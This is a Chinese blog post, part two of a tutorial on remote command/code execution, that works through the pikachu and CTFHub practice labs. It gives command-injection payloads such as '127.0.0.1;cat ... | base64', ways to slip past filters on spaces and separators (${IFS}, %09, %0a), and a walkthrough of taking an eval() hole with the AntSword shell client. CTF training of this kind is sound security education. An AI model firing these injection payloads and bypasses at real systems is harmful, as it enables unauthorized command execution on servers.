RCE远程控制漏洞(下)

已于 2022-06-23 12:40:00 修改
阅读量236 收藏
点赞数
分类专栏: 渗透测试 文章标签: 服务器 运维
于 2022-06-23 12:33:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hmysn/article/details/125423215
版权

目录

pikachu靶场基本认识

ctfhub靶场

上面一篇文章我们给出了一些关于RCE漏洞的基础知识,这篇文章我们通过靶场来进行更深一步的了解:

在靶场中我们可以通过命令的拼接来进行一系列的操作

pikachu靶场基本认识


比如:以pikachu靶场来进行实验:

127.0.0.1 & ipconfig(Mac系统中是ifconfig)
127.0.0.1 & whoami
phpinfo();(eval()函数)

这是单纯ping 127.0.0.1的是时候

输入phpinfo(); :

由此可见我们可以通过远程命令来获得很多程序的信息甚至是进行控制。

ctfhub靶场

pikachu这个靶场相对比较简单,接下来我们通过ctfhub来进行一些漏洞的利用:

拿CTFHUB中的eval的题目来进行一个演示:

我们看见这边有eval的函数,那么这边这里就是一个可以利用的漏洞,我们将网址复制到中国蚁剑上,这个程序的安装我们可以去百度一下,然后通过github安装。这边的密码我们通过php的代码可以看见。

 这里我们看见只有这一个php文件,我们就通过右击将其通过cmd打开:

然后从中我们发现了flag文件的位置,就可以通过cat来显示文件内容并进行提交。 

RCE的漏洞关于eval的大致都是这样利用,然后我们需要通过不同的要求来进行不同方式的利用

然后对于文件包含和命令注入的题目则是和pikachu的靶场一样,我们通过几个命令拼接就可以了:可能有以下几种流程:

命令注入 
1、代码审计 
2、payload 127.0.0.1;ls 寻找到flag地址
3  payload 127.0.0.1;cat 308563028813712.php | base64
4  base64解密得到flag

如果不允许使用cat命令: 

payload 127.0.0.1;
ls payload 127.0.0.1;
less 308563028813712.php | base64 base64
解密得到flag 


其他命令 cat 由第一行开始显示内容,并将所有内容输出 
tac 从最后一行倒序显示内容,并将所有内容输出 
more 根据窗口大小,一页一页的现实文件内容 
less 和more类似,但其优点可以往前翻页,而且进行可以搜索字符 
head 只显示头几行 
tail 只显示最后几行 
nl 类似于cat -n,显示时输出行号 
tailf 类似于tail -f
过滤空格 
payload 127.0.0.1;ls 
payload 127.0.0.1;cat${IFS}flag_2559114064936.php 
右键查看源码得到flag 

其他使用IFS$9、%09、<、>、<>、{,}、%20、${ IFS}、${IFS}来代替空格
过滤目录分隔符 
payload 127.0.0.1;ls 
payload 127.0.0.1&ls flag_is_here 
payload 127.0.0.1&cd flag_is_here;cat flag_ 133752248118633.php 
使用;或者%0a代替目录分隔符/
过滤运算符
 payload 127.0.0.1;ls 
payload 127.0.0.1; 
base64 flag_3969293319629.php 
base64解密得到flag

外咸瓜街的一条咸鱼
关注
专栏目录
[ 漏洞复现篇 ] sunlogin rce向日葵远程代码执行漏洞
qq_51577576的博客
04-14 2087
🍬博主介绍👨‍🎓博主介绍大家好,我是,很高兴认识大家~✨主攻领域【渗透领域】【数据通信】【通讯安全】【web安全】【面试分析】🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋🙏作者水平有限,欢迎各位大佬指点,相互学习进步!...
RCE远程代码执行漏洞(原理、危害、拼接字符、DVWA、pikachu、防御)
m0_61506558的博客
08-07 1322
什么是远程代码执行。
RCE远程控制漏洞(上)
hmysn的博客
06-22 972
目录什么是RCE远程控制漏洞漏洞的危害:PHP 会造成RCE执行漏洞的相关函数:linux的命令拼接符号:RCE漏洞作为漏洞中比较常见的一个,近年来在apache和python等等软件上都出现过巨大的bug,本篇文章对于RCE漏洞将会进行一个简单的介绍,关于什么是RCERCE的危害以及一些我们在寻找RCE漏洞时所需要的简单的一些基础知识的了解和预备,下一篇文章将会在靶场中对于这个漏洞的相关问题进行实操!...
发现多个远程控制服务 可欺骗漏洞(ALLyeSNO)
FreeXploiT
11-11 1077
研究了一下 vnc rad pcanywhere 发现类似的 漏洞 不过可利用性 难度高等把利用程序写好就公布
Windows远程桌面授权服务远程代码执行漏洞CVE-2024-38077
最新发布
sirius的博客
08-24 1012
Windows远程桌面授权服务远程代码执行漏洞CVE-2024-38077 狂躁许可(MadLicense)
远程控制漏洞CNVD-2022-10270/CNVD-2022-03672 向日葵RCE复现与解决
Gjqhs的博客
03-01 3415
上海贝锐信息科技股份有限公司的向日葵远控软件存在远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672),影响Windows系统使用的个人版和简约版,攻击者可利用该漏洞获取服务器控制权。 影响版本: 向日葵个人版 for Windows <= 11.0.0.33 向日葵简约版 <= V1.0.1.43315(2021.12) 实验环境 :win10虚拟机 工具下载(含有漏洞版本的向日葵):https://github.com/Mr-xn/sunlog...
攻击木马--远程控制软件自身的漏洞
04-30 1250
前两天的RSA conference上,有个叫Joel Eriksson的研究人员展示如何通过攻击木马(尤其是木马的控制端)来控制“黑客”。blog.wired.com/27bstroke6/2008/04/researcher-demo.htmlEriksson找到了一个在天朝比较流行的PCshare的漏洞,可以上传文件到控制端的自启动目录。:)这是他展示的Pcshare的图片,这张貌似和他说的
常见远程控制协议及漏洞总结
PokiFighting的专栏
03-23 5900
一、Telnet协议 Telnet协议是TCP/IP协议族中的一员,是Internet远程登陆服务的标准协议和主要方式。它为用户提供了在本地计算机上完成远程主机工作的能力。在終端使用者的电脑上使用telnet程序,用它连接到服务器。終端使用者可以在telnet程序中输入命令,这些命令会在服务器上运行,就像直接在服务器的控制台上输入一样。可以在本地就能控制服务器。 Telnet服务默认的端口为23 漏洞:telnet协议中最大的安全问题是缺乏加密。从正在配置的远程设备发送到联网设备的每个通信均以纯文本形
Spring RCE远程执行漏洞(CVE-2022-22965)
tpaer的博客
10-18 2646
这个洞22年3月底被大佬发现公布,由于Spring框架的影响范围太大了。复现条件又很低,本身就是高危的RCE漏洞可以直接拿到服务器的shell,像作者说的一样确实是一个核弹漏洞
RCE漏洞
weixin_46962006的博客
12-13 7650
                       RCE(远程代码/命令执行)漏洞 目录前言简介 前言        个人观点,若有误请指教 简介 RCE(Remote Code/Command Execute)为远程代码/命令执行的漏洞 漏洞产生的原因:在Web应用中开发者为了灵活性,简洁性等会让应用去调用代码或者系统命令执行函数去处理。同时没有考虑用户是否可以控制这些函数的参数问题(若不能控制这些参数,自然也没有这个漏洞;若能控制这些参数,也可能出现考虑了但没有完全防住或者压根没考虑 ????),以至
ThinkPHP3.2.x RCE漏洞通报1
08-03
【ThinkPHP3.2.x RCE漏洞通报】中提到的安全问题涉及到ThinkPHP 3.2版本的一个严重远程代码执行漏洞。这个漏洞源于框架中的`assign`方法,该方法用于将变量传递给模板进行渲染。当攻击者能够控制`assign`方法的第一...
远程代码执行漏洞
weixin_42610010的博客
01-02 683
远程代码执行漏洞是指在计算机系统上,攻击者可以通过网络连接远程执行指定的代码,甚至可以执行操作系统命令。这种漏洞通常存在于应用程序或服务器软件中,攻击者可以利用这种漏洞获取控制权并拥有对系统的完全访问权限。远程代码执行漏洞非常危险,可以造成严重的损害,包括数据泄露、恶意软件的传播、甚至系统完全失控。应该采取有效的措施来防范远程代码执行漏洞,包括使用最新的安全补丁、防火墙和其他安全措施。 ...
远程命令执行漏洞原理,以及防护绕过方式
Scalzdp的专栏
11-21 1795
今天分享了远程执行指令的原理和如何进行远程执行指令漏洞的利用和绕过方法,远程命令执行的漏洞危害性特别大,攻击者可以利用远程命令执行漏洞给运营团队带来如下一些危害:继承Web服务程序的权限去执行系统命令或读写文件、反弹shell、控制整个网站甚至服务器、进一步内网渗透。在防御的过程我们可以通过加强对用户输入的验证:比如限制输入内容,其次,采用最小权限原则,将程序运行权限限制在最低限度。
RCE
fj2655448262的博客
03-09 521
RCE的定义:RCE远程控制设备,可以让攻击者直接向后台服务远程注入操作系统命令和代码,从而控制后台
Web漏洞-RCE代码及命令执行漏洞全解-web漏洞产生的原理及条件-墨者靶场详解
ran的博客
04-03 2073
指用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令,可能会允许攻击者通过改变 $PATH 或程序执行环境的其他方面来执行一个恶意构造的代码。在Web应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用代码或命令执行函数去处理。比如当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏洞。墨者靶场详解。
RCE漏洞详解及绕过总结(全面)
热门推荐
永不落的梦想
07-10 1万+
包括RCE漏洞的原理,常见的造成RCE漏洞的函数解析,以及限制绕过的各种姿势
RCE漏洞以及命令执行漏洞
weixin_52657559的博客
12-07 870
代码执行漏洞/命令执行漏洞演示
远程代码执行漏洞RCE原理
03-28
远程代码执行漏洞(Remote Code Execution,RCE)是指攻击者通过利用程序或系统中的漏洞,成功地在远程主机上执行自己编写或者上传的恶意代码。攻击者可以利用这个漏洞执行系统命令、上传或下载文件、获取敏感信息等,从而对系统进行攻击。 RCE漏洞的原理是攻击者在程序或系统中注入恶意代码,并且成功执行该代码,从而实现攻击目的。攻击者通常利用程序或系统中的安全漏洞,比如未经过滤的用户输入、未授权的访问、缓冲区溢出等进行攻击,通过给予恶意代码执行权限,轻松地控制远程主机。 RCE漏洞的危害非常大,攻击者可以通过该漏洞远程控制系统,获取敏感信息,甚至篡改系统中的数据。因此,对于程序开发人员和系统管理员来说,必须要重视漏洞的防范和修复工作,及时更新补丁,加强安全防护,从而有效地防范远程代码执行漏洞的攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值